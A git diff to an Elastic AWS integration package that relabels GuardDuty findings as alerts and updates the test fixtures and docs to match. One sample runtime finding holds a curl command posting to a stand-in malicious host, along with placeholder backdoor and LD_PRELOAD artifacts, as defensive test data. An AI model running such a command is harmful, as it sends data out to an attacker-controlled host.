diff --git a/packages/aws/changelog.yml b/packages/aws/changelog.yml index 2955601ae8c..52bcea4532b 100644 --- a/packages/aws/changelog.yml +++ b/packages/aws/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "6.15.0" + changes: + - description: Set `event.kind` to `alert` for AWS GuardDuty findings. + type: enhancement + link: https://github.com/elastic/integrations/pull/18895 - version: "6.14.2" changes: - description: Fix NextToken invalidation in Security Hub, GuardDuty, and Inspector by removing the upper time bound from paginated queries. diff --git a/packages/aws/data_stream/guardduty/_dev/test/pipeline/test-guardduty.log-expected.json b/packages/aws/data_stream/guardduty/_dev/test/pipeline/test-guardduty.log-expected.json index f90a256ecf1..728dde92ef6 100644 --- a/packages/aws/data_stream/guardduty/_dev/test/pipeline/test-guardduty.log-expected.json +++ b/packages/aws/data_stream/guardduty/_dev/test/pipeline/test-guardduty.log-expected.json @@ -186,7 +186,7 @@ "end": "2022-11-22T12:22:20.000Z", "id": "d6012345678912345678912349f831b8f", "kind": [ - "event" + "alert" ], "original": "{\"schemaVersion\":\"2.0\",\"accountId\":\"123412341234\",\"region\":\"us-east-1\",\"partition\":\"aws\",\"id\":\"d6012345678912345678912349f831b8f\",\"arn\":\"arn:aws:guardduty:us-east-1:123412341234:detector/d60123456789e5461eabcd1234abcd1234/finding/d6012345678912345678912349f831b8f\",\"type\":\"Trojan:EC2/BlackholeTraffic!DNS\",\"resource\":{\"resourceType\":\"Instance\",\"instanceDetails\":{\"instanceId\":\"i-99999999\",\"instanceType\":\"m3.xlarge\",\"outpostArn\":\"arn:aws:outposts:us-west-2:123456789000:outpost/op-abcdefabcdef1234\",\"launchTime\":\"2016-08-02T02:05:06.000Z\",\"platform\":null,\"productCodes\":[{\"productCodeId\":\"GeneratedFindingProductCodeId\",\"productCodeType\":\"GeneratedFindingProductCodeType\"}],\"iamInstanceProfile\":{\"arn\":\"arn:aws:iam::123412341234:example/instance/profile\",\"id\":\"GeneratedFindingInstanceProfileId\"},\"networkInterfaces\":[{\"networkInterfaceId\":\"eni-abcdef888\",\"privateIpAddresses\":[{\"privateDnsName\":\"GeneratedFindingPrivateName\",\"privateIpAddress\":\"175.16.199.1\"}],\"subnetId\":\"GeneratedFindingSubnetId\",\"vpcId\":\"GeneratedFindingVPCId\",\"privateDnsName\":\"GeneratedFindingPrivateDnsName\",\"securityGroups\":[{\"groupName\":\"GeneratedFindingSecurityGroupName\",\"groupId\":\"GeneratedFindingSecurityId\"}],\"publicIp\":\"175.16.199.1\",\"ipv6Addresses\":[],\"publicDnsName\":\"GeneratedFindingPublicDNSName\",\"privateIpAddress\":\"175.16.199.1\"}],\"tags\":[{\"value\":\"GeneratedFindingInstaceValue1\",\"key\":\"GeneratedFindingInstaceTag1\"},{\"value\":\"GeneratedFindingInstaceTagValue2\",\"key\":\"GeneratedFindingInstaceTag2\"},{\"value\":\"GeneratedFindingInstaceTagValue3\",\"key\":\"GeneratedFindingInstaceTag3\"},{\"value\":\"GeneratedFindingInstaceTagValue4\",\"key\":\"GeneratedFindingInstaceTag4\"},{\"value\":\"GeneratedFindingInstaceTagValue5\",\"key\":\"GeneratedFindingInstaceTag5\"},{\"value\":\"GeneratedFindingInstaceTagValue6\",\"key\":\"GeneratedFindingInstaceTag6\"},{\"value\":\"GeneratedFindingInstaceTagValue7\",\"key\":\"GeneratedFindingInstaceTag7\"},{\"value\":\"GeneratedFindingInstaceTagValue8\",\"key\":\"GeneratedFindingInstaceTag8\"},{\"value\":\"GeneratedFindingInstaceTagValue9\",\"key\":\"GeneratedFindingInstaceTag9\"}],\"instanceState\":\"running\",\"availabilityZone\":\"GeneratedFindingInstaceAvailabilityZone\",\"imageId\":\"ami-99999999\",\"imageDescription\":\"GeneratedFindingInstaceImageDescription\"}},\"service\":{\"serviceName\":\"guardduty\",\"detectorId\":\"d60123456789e5461eabcd1234abcd1234\",\"action\":{\"actionType\":\"DNS_REQUEST\",\"dnsRequestAction\":{\"domain\":\"GeneratedFindingDomainName\",\"protocol\":\"UDP\",\"blocked\":true}},\"resourceRole\":\"TARGET\",\"additionalInfo\":{\"threatListName\":\"GeneratedFindingThreatListName\",\"sample\":true,\"value\":\"{\\\"threatListName\\\":\\\"GeneratedFindingThreatListName\\\",\\\"sample\\\":true}\",\"type\":\"default\"},\"evidence\":{\"threatIntelligenceDetails\":[{\"threatNames\":[\"GeneratedFindingThreatName\"],\"threatListName\":\"GeneratedFindingThreatListName\"}]},\"eventFirstSeen\":\"2022-11-17T09:33:19.000Z\",\"eventLastSeen\":\"2022-11-22T12:22:20.000Z\",\"archived\":false,\"count\":2},\"severity\":5,\"createdAt\":\"2022-11-17T09:33:19.224Z\",\"updatedAt\":\"2022-11-22T12:22:20.934Z\",\"title\":\"Blackholed domain name queried by EC2 instance i-99999999.\",\"description\":\"EC2 instance i-99999999 is querying a domain name of a blackholed domain.\"}", "severity": 5, @@ -343,7 +343,7 @@ "end": "2022-11-22T12:22:20.000Z", "id": "250023a9abcdefabcdef12345678", "kind": [ - "event" + "alert" ], "original": "{\"schemaVersion\":\"2.0\",\"accountId\":\"123412341234\",\"region\":\"us-east-1\",\"partition\":\"aws\",\"id\":\"250023a9abcdefabcdef12345678\",\"arn\":\"arn:aws:guardduty:us-east-1:123412341234:detector/abcdefe19ce5461eabcd1234abcd1234/finding/250023a9abcdefabcdef12345678\",\"type\":\"Persistence:Kubernetes/SuccessfulAnonymousAccess\",\"resource\":{\"resourceType\":\"EKSCluster\",\"eksClusterDetails\":{\"name\":\"GeneratedFindingEKSClusterName\",\"arn\":\"GeneratedFindingEKSClusterArn\",\"createdAt\":1636625755.218,\"vpcId\":\"GeneratedFindingEKSClusterVpcId\",\"status\":\"ACTIVE\",\"tags\":[{\"value\":\"GeneratedFindingEKSClusterTagValue1\",\"key\":\"GeneratedFindingEKSClusterTag1\"},{\"value\":\"GeneratedFindingEKSClusterTagValue2\",\"key\":\"GeneratedFindingEKSClusterTag2\"},{\"value\":\"GeneratedFindingEKSClusterTagValue3\",\"key\":\"GeneratedFindingEKSClusterTag3\"}]},\"kubernetesDetails\":{\"kubernetesWorkloadDetails\":null,\"kubernetesUserDetails\":{\"username\":\"system:anonymous\",\"uid\":\"GeneratedFindingUID\",\"groups\":[\"system:unauthenticated\"]}}},\"service\":{\"serviceName\":\"guardduty\",\"detectorId\":\"abcdefe19ce5461eabcd1234abcd1234\",\"action\":{\"actionType\":\"KUBERNETES_API_CALL\",\"kubernetesApiCallAction\":{\"requestUri\":\"GeneratedFindingRequestURI\",\"verb\":\"get\",\"sourceIPs\":[\"175.16.199.1\"],\"userAgent\":\"\",\"remoteIpDetails\":{\"ipAddressV4\":\"175.16.199.1\",\"organization\":{\"asn\":\"0\",\"asnOrg\":\"GeneratedFindingASNOrg\",\"isp\":\"GeneratedFindingISP\",\"org\":\"GeneratedFindingORG\"},\"country\":{\"countryName\":\"GeneratedFindingCountryName\"},\"city\":{\"cityName\":\"GeneratedFindingCityName\"},\"geoLocation\":{\"lat\":0,\"lon\":0}},\"statusCode\":200,\"parameters\":\"GeneratedFindingActionParameters\"}},\"resourceRole\":\"TARGET\",\"additionalInfo\":{\"sample\":true,\"value\":\"{\\\"sample\\\":true}\",\"type\":\"default\"},\"evidence\":null,\"eventFirstSeen\":\"2022-11-17T09:33:19.000Z\",\"eventLastSeen\":\"2022-11-22T12:22:20.000Z\",\"archived\":false,\"count\":2},\"severity\":8,\"createdAt\":\"2022-11-17T09:33:19.225Z\",\"updatedAt\":\"2022-11-22T12:22:20.935Z\",\"title\":\"Kubernetes API commonly used in Persistence tactics invoked by the anonymous user.\",\"description\":\"Kubernetes API commonly used in Persistence tactics was invoked on cluster GeneratedFindingEKSClusterName by the anonymous user system:anonymous.\"}", "severity": 8, @@ -556,7 +556,7 @@ "end": "2022-11-22T12:22:20.000Z", "id": "43b6abcdeabcdeabcde1234562176924", "kind": [ - "event" + "alert" ], "original": "{\"schemaVersion\":\"2.0\",\"accountId\":\"123412341234\",\"region\":\"us-east-1\",\"partition\":\"aws\",\"id\":\"43b6abcdeabcdeabcde1234562176924\",\"arn\":\"arn:aws:guardduty:us-east-1:123412341234:detector/12341234e19ce5461eabcd1234abcd1234/finding/43b6abcdeabcdeabcde1234562176924\",\"type\":\"Discovery:Kubernetes/TorIPCaller\",\"resource\":{\"resourceType\":\"EKSCluster\",\"eksClusterDetails\":{\"name\":\"GeneratedFindingEKSClusterName\",\"arn\":\"GeneratedFindingEKSClusterArn\",\"createdAt\":1635962410.342,\"vpcId\":\"GeneratedFindingEKSClusterVpcId\",\"status\":\"ACTIVE\",\"tags\":[{\"value\":\"GeneratedFindingEKSClusterTagValue1\",\"key\":\"GeneratedFindingEKSClusterTag1\"},{\"value\":\"GeneratedFindingEKSClusterTagValue2\",\"key\":\"GeneratedFindingEKSClusterTag2\"},{\"value\":\"GeneratedFindingEKSClusterTagValue3\",\"key\":\"GeneratedFindingEKSClusterTag3\"}]},\"kubernetesDetails\":{\"kubernetesWorkloadDetails\":null,\"kubernetesUserDetails\":{\"username\":\"GeneratedFindingUserName\",\"uid\":\"GeneratedFindingUID\",\"groups\":[\"GeneratedFindingUserGroup\"]}},\"accessKeyDetails\":{\"accessKeyId\":\"GeneratedFindingAccessKeyId\",\"principalId\":\"GeneratedFindingPrincipalId\",\"userType\":\"Role\",\"userName\":\"GeneratedFindingUserName\"}},\"service\":{\"serviceName\":\"guardduty\",\"detectorId\":\"12341234e19ce5461eabcd1234abcd1234\",\"action\":{\"actionType\":\"KUBERNETES_API_CALL\",\"kubernetesApiCallAction\":{\"requestUri\":\"GeneratedFindingRequestURI\",\"verb\":\"list\",\"sourceIPs\":[\"175.16.199.1\"],\"userAgent\":\"\",\"remoteIpDetails\":{\"ipAddressV4\":\"175.16.199.1\",\"organization\":{\"asn\":\"0\",\"asnOrg\":\"GeneratedFindingASNOrg\",\"isp\":\"GeneratedFindingISP\",\"org\":\"GeneratedFindingORG\"},\"country\":{\"countryName\":\"GeneratedFindingCountryName\"},\"city\":{\"cityName\":\"GeneratedFindingCityName\"},\"geoLocation\":{\"lat\":0,\"lon\":0}},\"statusCode\":200}},\"resourceRole\":\"TARGET\",\"additionalInfo\":{\"threatName\":\"GeneratedFindingThreatName\",\"threatListName\":\"GeneratedFindingThreatListName\",\"sample\":true,\"value\":\"{\\\"threatName\\\":\\\"GeneratedFindingThreatName\\\",\\\"threatListName\\\":\\\"GeneratedFindingThreatListName\\\",\\\"sample\\\":true}\",\"type\":\"default\"},\"evidence\":{\"threatIntelligenceDetails\":[{\"threatNames\":[\"GeneratedFindingThreatName\"],\"threatListName\":\"GeneratedFindingThreatListName\"}]},\"eventFirstSeen\":\"2022-11-17T09:33:19.000Z\",\"eventLastSeen\":\"2022-11-22T12:22:20.000Z\",\"archived\":false,\"count\":2},\"severity\":5,\"createdAt\":\"2022-11-17T09:33:19.228Z\",\"updatedAt\":\"2022-11-22T12:22:20.938Z\",\"title\":\"Kubernetes API commonly used in Discovery tactics invoked from a Tor exit node IP address.\",\"description\":\"Kubernetes API commonly used in Discovery tactics was invoked on cluster GeneratedFindingEKSClusterName from Tor exit node IP address 175.16.199.1.\"}", "severity": 5, @@ -753,7 +753,7 @@ "end": "2022-12-07T10:28:35.000Z", "id": "5abcdefabcdefabcdef2a123456789f6", "kind": [ - "event" + "alert" ], "original": "{\"schemaVersion\":\"2.0\",\"accountId\":\"123412341234\",\"region\":\"us-east-1\",\"partition\":\"aws\",\"id\":\"5abcdefabcdefabcdef2a123456789f6\",\"arn\":\"arn:aws:guardduty:us-east-1:123412341234:detector/4ec22961e1defabcdefabcdef2a1234/finding/5abcdefabcdefabcdef2a123456789f6\",\"type\":\"CredentialAccess:RDS/AnomalousBehavior.SuccessfulLogin\",\"resource\":{\"resourceType\":\"RDSDBInstance\",\"rdsDbInstanceDetails\":{\"dbInstanceIdentifier\":\"GeneratedFindingDBInstanceId\",\"engine\":\"GeneratedFindingEngine\",\"engineVersion\":\"13.6\",\"dbClusterIdentifier\":\"GeneratedFindingDBClusterId\",\"dbInstanceArn\":\"arn:aws:rds:us-east-1:123456789000:db:GeneratedFindingDBInstanceId\"},\"rdsDbUserDetails\":{\"user\":\"GeneratedFindingUserName\",\"application\":\"GeneratedFindingApplicationName\",\"database\":\"GeneratedFindingDatabaseName\",\"ssl\":\"GeneratedSSLValue\",\"authMethod\":\"GeneratedFindingAuthMethod\"}},\"service\":{\"action\":{\"actionType\":\"RDS_LOGIN_ATTEMPT\",\"rdsLoginAttemptAction\":{\"remoteIpDetails\":{\"ipAddressV4\":\"175.16.199.1\",\"organization\":{\"asn\":\"0\",\"asnOrg\":\"GeneratedFindingAsnOrg\",\"isp\":\"GeneratedFindingIsp\",\"org\":\"GeneratedFindingOrg\"},\"country\":{\"countryName\":\"GeneratedFindingCountryName\"},\"city\":{\"cityName\":\"GeneratedFindingCityName\"},\"geoLocation\":{\"lat\":0,\"lon\":0}}}},\"additionalInfo\":{\"unusualBehavior\":{\"unusualUserNameClusterProfiling\":{\"userName\":\"GeneratedFindingUserName\",\"failedLoginCount\":0,\"successfulLoginCount\":1,\"incompleteConnectionCount\":0},\"unusualASNClusterProfiling\":{\"asnOrg\":\"GeneratedFindingAsnOrg\",\"failedLoginCount\":0,\"successfulLoginCount\":10,\"incompleteConnectionCount\":0},\"unusualApplicationNameClusterProfiling\":{\"applicationName\":\"GeneratedFindingApplicationName\",\"failedLoginCount\":0,\"successfulLoginCount\":1,\"incompleteConnectionCount\":0},\"unusualDatabaseNameClusterProfiling\":{\"databaseName\":\"GeneratedFindingDatabaseName\",\"failedLoginCount\":0,\"successfulLoginCount\":1,\"incompleteConnectionCount\":0}},\"sample\":true,\"value\":\"{\\\"unusualBehavior\\\":{\\\"unusualUserNameClusterProfiling\\\":{\\\"userName\\\":\\\"GeneratedFindingUserName\\\",\\\"failedLoginCount\\\":0,\\\"successfulLoginCount\\\":1,\\\"incompleteConnectionCount\\\":0},\\\"unusualASNClusterProfiling\\\":{\\\"asnOrg\\\":\\\"GeneratedFindingAsnOrg\\\",\\\"failedLoginCount\\\":0,\\\"successfulLoginCount\\\":10,\\\"incompleteConnectionCount\\\":0},\\\"unusualApplicationNameClusterProfiling\\\":{\\\"applicationName\\\":\\\"GeneratedFindingApplicationName\\\",\\\"failedLoginCount\\\":0,\\\"successfulLoginCount\\\":1,\\\"incompleteConnectionCount\\\":0},\\\"unusualDatabaseNameClusterProfiling\\\":{\\\"databaseName\\\":\\\"GeneratedFindingDatabaseName\\\",\\\"failedLoginCount\\\":0,\\\"successfulLoginCount\\\":1,\\\"incompleteConnectionCount\\\":0}},\\\"sample\\\":true}\",\"type\":\"default\"},\"resourceRole\":\"TARGET\",\"evidence\":null,\"count\":1,\"detectorId\":\"4ec22961e1defabcdefabcdef2a1234\",\"eventFirstSeen\":\"2022-12-07T10:28:35.000Z\",\"eventLastSeen\":\"2022-12-07T10:28:35.000Z\",\"serviceName\":\"guardduty\",\"archived\":false},\"createdAt\":\"2022-12-07T10:28:35.948Z\",\"severity\":8,\"updatedAt\":\"2022-12-07T10:28:35.948Z\",\"title\":\"Unusual successful login by GeneratedFindingUserName observed on RDS instance GeneratedFindingDBInstanceId.\",\"description\":\"Unusual successful login by GeneratedFindingUserName observed on RDS instance GeneratedFindingDBInstanceId.\"}", "severity": 8, @@ -1017,7 +1017,7 @@ "end": "2024-10-04T04:06:30.383Z", "id": "abcd1234", "kind": [ - "event" + "alert" ], "original": "{\"schemaVersion\":\"2.0\",\"accountId\":\"123456789\",\"region\":\"us-west-1\",\"partition\":\"aws\",\"id\":\"abcd1234\",\"arn\":\"arn:aws:guardduty:us-west-1:abcd1234:detector/abcd1234/finding/abcd1234\",\"type\":\"PrivilegeEscalation:Runtime/DockerSocketAccessed\",\"resource\":{\"resourceType\":\"Container\",\"instanceDetails\":{\"instanceId\":\"i-abcd1234\",\"instanceType\":\"m2.large\",\"launchTime\":\"2024-07-29T17:58:17.000Z\",\"platform\":null,\"productCodes\":[],\"iamInstanceProfile\":{\"arn\":\"arn:aws:iam::abcd1234:instance-profile/buildserver_profile\",\"id\":\"AAAAAAAAAAAAAAAAAAA\"},\"networkInterfaces\":[{\"ipv6Addresses\":[],\"networkInterfaceId\":\"eni-abcd1234\",\"privateDnsName\":\"[ip-10-30-30-15.us](https://ip-10-30-30-15.us/)-west-1.compute.internal\",\"privateIpAddress\":\"10.30.30.15\",\"privateIpAddresses\":[{\"privateDnsName\":\"[ip-10-30-30-15.us](https://ip-10-30-30-15.us/)-west-1.compute.internal\",\"privateIpAddress\":\"10.30.30.15\"}],\"subnetId\":\"subnet-abcd1234\",\"vpcId\":\"vpc-abcd1234\",\"securityGroups\":[{\"groupName\":\"build\",\"groupId\":\"sg-abcd1234\"},{\"groupName\":\"main\",\"groupId\":\"sg-abcd1234\"}],\"publicDnsName\":\"[ec2-216.160.83.56.us-west-1.compute.amazonaws.com](https://ec2-216.160.83.56.us-west-1.compute.amazonaws.com/)\",\"publicIp\":\"216.160.83.56\"}],\"outpostArn\":null,\"tags\":[{\"key\":\"Name\",\"value\":\"buildserver-a-0\"},{\"key\":\"group\",\"value\":\"build-server\"}],\"instanceState\":\"running\",\"availabilityZone\":\"us-west-1b\",\"imageId\":\"ami-abcd1234\",\"imageDescription\":\"Ubuntu 20.04 AMI with Docker installed\"},\"containerDetails\":{\"containerRuntime\":\"docker\",\"id\":\"abcd1234\",\"name\":null,\"image\":\"[abcd1234.us-west-1.amazonaws.com/mirror/test/infrastructure-bundle:2.8.37](https://abcd1234.us-west-1.amazonaws.com/mirror/test/infrastructure-bundle:2.8.37)\",\"imageUid\":null,\"volumeMounts\":null,\"securityContext\":null,\"imagePrefix\":null}},\"service\":{\"serviceName\":\"guardduty\",\"featureName\":\"RuntimeMonitoring\",\"detectorId\":\"abcd1234\",\"action\":{},\"runtimeDetails\":{\"context\":{\"addressFamily\":\"AF_INET\",\"commandLineExample\":\"/usr/bin/curl -X POST http://malicious.example.com\",\"fileSystemType\":\"ext4\",\"flags\":[\"ro\"],\"ianaProtocolNumber\":6,\"ldPreloadValue\":\"/usr/lib/libmalicious.so\",\"libraryPath\":\"/usr/lib/libc.so.6\",\"memoryRegions\":[\"heap\",\"stack\"],\"modifiedAt\":\"2024-10-07T18:45:30Z\",\"modifyingProcess\":{\"name\":\"bash\",\"pid\":2451,\"user\":\"root\"},\"moduleFilePath\":\"/lib/modules/5.15.0-1023-generic/kernel/net/ipv4/netfilter/ipt_MAL.so\",\"moduleName\":\"ipt_MAL\",\"moduleSha256\":\"3f79bb7b435b05321651daef713b4ea0\",\"mountSource\":\"/dev/sda1\",\"mountTarget\":\"/mnt/data\",\"releaseAgentPath\":\"/mnt/container/release_agent\",\"runcBinaryPath\":\"/usr/sbin/runc\",\"scriptPath\":\"/usr/local/bin/malicious_script.sh\",\"serviceName\":\"firewalld\",\"shellHistoryFilePath\":\"/root/.bash_history\",\"socketPath\":\"/var/run/docker.sock\",\"targetProcess\":{\"name\":\"sshd\",\"pid\":3124,\"user\":\"admin\"},\"threatFilePath\":\"/tmp/malicious_file.bin\",\"toolCategory\":\"Backdoor Tool\",\"toolName\":\"SSH Backdoor\"},\"process\":{\"euid\":1000,\"executablePath\":\"/usr/bin/ssh\",\"executableSha256\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"lineage\":[{\"parentUuid\":\"f7c2b111-4355-45f2-8462-3e418af0a1cc\",\"ancestorPid\":123,\"ancestorName\":\"sshd\"},{\"parentUuid\":\"a23f2d33-9b4e-4e18-b18e-5b4b25efce88\",\"ancestorPid\":456,\"ancestorName\":\"apache2\"}],\"name\":\"sshd\",\"namespacePid\":456,\"parentUuid\":\"f7c2b111-4355-45f2-8462-3e418af0a1cc\",\"pid\":2345,\"pwd\":\"/home/user\",\"startTime\":1728014790.3773646,\"user\":\"admin\",\"userId\":1000,\"uuid\":\"abc12345-def6-7890-ghij-klmnopqrstuv\"}},\"additionalInfo\":{\"value\":\"{}\",\"type\":\"default\"},\"eventFirstSeen\":\"2024-07-24T04:03:51.666Z\",\"eventLastSeen\":\"2024-10-04T04:06:30.383Z\",\"archived\":false,\"count\":9},\"severity\":5,\"createdAt\":\"2024-07-24T04:06:10.359Z\",\"updatedAt\":\"2024-10-04T04:09:13.066Z\",\"title\":\"A container is communicating with a docker socket.\",\"description\":\"A process is communicating with a docker socket using a unix socket.\"}", "severity": 5, diff --git a/packages/aws/data_stream/guardduty/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/guardduty/elasticsearch/ingest_pipeline/default.yml index 4f5a5de3ee0..c8b56b04819 100644 --- a/packages/aws/data_stream/guardduty/elasticsearch/ingest_pipeline/default.yml +++ b/packages/aws/data_stream/guardduty/elasticsearch/ingest_pipeline/default.yml @@ -17,7 +17,7 @@ processors: as they can collide with ECS fields. - set: field: event.kind - value: [event] + value: [alert] - set: field: event.type value: [info] diff --git a/packages/aws/data_stream/guardduty/sample_event.json b/packages/aws/data_stream/guardduty/sample_event.json index 75f12073d69..26a52491eab 100644 --- a/packages/aws/data_stream/guardduty/sample_event.json +++ b/packages/aws/data_stream/guardduty/sample_event.json @@ -159,7 +159,7 @@ "id": "e0c22973b012f3af67ac593443e920ff", "ingested": "2025-11-12T05:48:59Z", "kind": [ - "event" + "alert" ], "original": "{\"accountId\":\"123412341234\",\"arn\":\"arn:aws:guardduty:us-east-1:123412341234:detector/12341234e19ce5461eabcd1234abcd1234/finding/43b6abcdeabcdeabcde1234562176924\",\"createdAt\":\"2022-11-17T09:33:19.228Z\",\"description\":\"Kubernetes API commonly used in Discovery tactics was invoked on cluster GeneratedFindingEKSClusterName from Tor exit node IP address 175.16.199.1.\",\"id\":\"e0c22973b012f3af67ac593443e920ff\",\"partition\":\"aws\",\"region\":\"us-east-1\",\"resource\":{\"accessKeyDetails\":{\"accessKeyId\":\"GeneratedFindingAccessKeyId\",\"principalId\":\"GeneratedFindingPrincipalId\",\"userName\":\"GeneratedFindingUserName\",\"userType\":\"Role\"},\"eksClusterDetails\":{\"arn\":\"GeneratedFindingEKSClusterArn\",\"createdAt\":1635962410.342,\"name\":\"GeneratedFindingEKSClusterName\",\"status\":\"ACTIVE\",\"tags\":[{\"key\":\"GeneratedFindingEKSClusterTag1\",\"value\":\"GeneratedFindingEKSClusterTagValue1\"},{\"key\":\"GeneratedFindingEKSClusterTag2\",\"value\":\"GeneratedFindingEKSClusterTagValue2\"},{\"key\":\"GeneratedFindingEKSClusterTag3\",\"value\":\"GeneratedFindingEKSClusterTagValue3\"}],\"vpcId\":\"GeneratedFindingEKSClusterVpcId\"},\"kubernetesDetails\":{\"kubernetesUserDetails\":{\"groups\":[\"GeneratedFindingUserGroup\"],\"uid\":\"GeneratedFindingUID\",\"username\":\"GeneratedFindingUserName\"},\"kubernetesWorkloadDetails\":null},\"resourceType\":\"EKSCluster\"},\"schemaVersion\":\"2.0\",\"service\":{\"action\":{\"actionType\":\"KUBERNETES_API_CALL\",\"kubernetesApiCallAction\":{\"remoteIpDetails\":{\"city\":{\"cityName\":\"GeneratedFindingCityName\"},\"country\":{\"countryName\":\"GeneratedFindingCountryName\"},\"geoLocation\":{\"lat\":0,\"lon\":0},\"ipAddressV4\":\"175.16.199.1\",\"organization\":{\"asn\":\"0\",\"asnOrg\":\"GeneratedFindingASNOrg\",\"isp\":\"GeneratedFindingISP\",\"org\":\"GeneratedFindingORG\"}},\"requestUri\":\"GeneratedFindingRequestURI\",\"sourceIPs\":[\"175.16.199.1\"],\"statusCode\":200,\"userAgent\":\"\",\"verb\":\"list\"}},\"additionalInfo\":{\"sample\":true,\"threatListName\":\"GeneratedFindingThreatListName\",\"threatName\":\"GeneratedFindingThreatName\",\"type\":\"default\",\"value\":\"{\\\"threatName\\\":\\\"GeneratedFindingThreatName\\\",\\\"threatListName\\\":\\\"GeneratedFindingThreatListName\\\",\\\"sample\\\":true}\"},\"archived\":false,\"count\":2,\"detectorId\":\"12341234e19ce5461eabcd1234abcd1234\",\"eventFirstSeen\":\"2022-11-17T09:33:19.000Z\",\"eventLastSeen\":\"2022-11-22T12:22:20.000Z\",\"evidence\":{\"threatIntelligenceDetails\":[{\"threatListName\":\"GeneratedFindingThreatListName\",\"threatNames\":[\"GeneratedFindingThreatName\"]}]},\"resourceRole\":\"TARGET\",\"serviceName\":\"guardduty\"},\"severity\":5,\"title\":\"Kubernetes API commonly used in Discovery tactics invoked from a Tor exit node IP address.\",\"type\":\"Discovery:Kubernetes/TorIPCaller\",\"updatedAt\":\"2022-11-22T12:22:20.938Z\"}", "severity": 5, diff --git a/packages/aws/docs/guardduty.md b/packages/aws/docs/guardduty.md index fd0613bd14a..eb1d7ba6669 100644 --- a/packages/aws/docs/guardduty.md +++ b/packages/aws/docs/guardduty.md @@ -253,7 +253,7 @@ An example event for `guardduty` looks as following: "id": "e0c22973b012f3af67ac593443e920ff", "ingested": "2025-11-12T05:48:59Z", "kind": [ - "event" + "alert" ], "original": "{\"accountId\":\"123412341234\",\"arn\":\"arn:aws:guardduty:us-east-1:123412341234:detector/12341234e19ce5461eabcd1234abcd1234/finding/43b6abcdeabcdeabcde1234562176924\",\"createdAt\":\"2022-11-17T09:33:19.228Z\",\"description\":\"Kubernetes API commonly used in Discovery tactics was invoked on cluster GeneratedFindingEKSClusterName from Tor exit node IP address 175.16.199.1.\",\"id\":\"e0c22973b012f3af67ac593443e920ff\",\"partition\":\"aws\",\"region\":\"us-east-1\",\"resource\":{\"accessKeyDetails\":{\"accessKeyId\":\"GeneratedFindingAccessKeyId\",\"principalId\":\"GeneratedFindingPrincipalId\",\"userName\":\"GeneratedFindingUserName\",\"userType\":\"Role\"},\"eksClusterDetails\":{\"arn\":\"GeneratedFindingEKSClusterArn\",\"createdAt\":1635962410.342,\"name\":\"GeneratedFindingEKSClusterName\",\"status\":\"ACTIVE\",\"tags\":[{\"key\":\"GeneratedFindingEKSClusterTag1\",\"value\":\"GeneratedFindingEKSClusterTagValue1\"},{\"key\":\"GeneratedFindingEKSClusterTag2\",\"value\":\"GeneratedFindingEKSClusterTagValue2\"},{\"key\":\"GeneratedFindingEKSClusterTag3\",\"value\":\"GeneratedFindingEKSClusterTagValue3\"}],\"vpcId\":\"GeneratedFindingEKSClusterVpcId\"},\"kubernetesDetails\":{\"kubernetesUserDetails\":{\"groups\":[\"GeneratedFindingUserGroup\"],\"uid\":\"GeneratedFindingUID\",\"username\":\"GeneratedFindingUserName\"},\"kubernetesWorkloadDetails\":null},\"resourceType\":\"EKSCluster\"},\"schemaVersion\":\"2.0\",\"service\":{\"action\":{\"actionType\":\"KUBERNETES_API_CALL\",\"kubernetesApiCallAction\":{\"remoteIpDetails\":{\"city\":{\"cityName\":\"GeneratedFindingCityName\"},\"country\":{\"countryName\":\"GeneratedFindingCountryName\"},\"geoLocation\":{\"lat\":0,\"lon\":0},\"ipAddressV4\":\"175.16.199.1\",\"organization\":{\"asn\":\"0\",\"asnOrg\":\"GeneratedFindingASNOrg\",\"isp\":\"GeneratedFindingISP\",\"org\":\"GeneratedFindingORG\"}},\"requestUri\":\"GeneratedFindingRequestURI\",\"sourceIPs\":[\"175.16.199.1\"],\"statusCode\":200,\"userAgent\":\"\",\"verb\":\"list\"}},\"additionalInfo\":{\"sample\":true,\"threatListName\":\"GeneratedFindingThreatListName\",\"threatName\":\"GeneratedFindingThreatName\",\"type\":\"default\",\"value\":\"{\\\"threatName\\\":\\\"GeneratedFindingThreatName\\\",\\\"threatListName\\\":\\\"GeneratedFindingThreatListName\\\",\\\"sample\\\":true}\"},\"archived\":false,\"count\":2,\"detectorId\":\"12341234e19ce5461eabcd1234abcd1234\",\"eventFirstSeen\":\"2022-11-17T09:33:19.000Z\",\"eventLastSeen\":\"2022-11-22T12:22:20.000Z\",\"evidence\":{\"threatIntelligenceDetails\":[{\"threatListName\":\"GeneratedFindingThreatListName\",\"threatNames\":[\"GeneratedFindingThreatName\"]}]},\"resourceRole\":\"TARGET\",\"serviceName\":\"guardduty\"},\"severity\":5,\"title\":\"Kubernetes API commonly used in Discovery tactics invoked from a Tor exit node IP address.\",\"type\":\"Discovery:Kubernetes/TorIPCaller\",\"updatedAt\":\"2022-11-22T12:22:20.938Z\"}", "severity": 5, diff --git a/packages/aws/manifest.yml b/packages/aws/manifest.yml index bf789bf24ec..c0665493806 100644 --- a/packages/aws/manifest.yml +++ b/packages/aws/manifest.yml @@ -1,7 +1,7 @@ format_version: 3.4.0 name: aws title: AWS -version: 6.14.2 +version: 6.15.0 description: Collect logs and metrics from Amazon Web Services (AWS) with Elastic Agent. type: integration categories: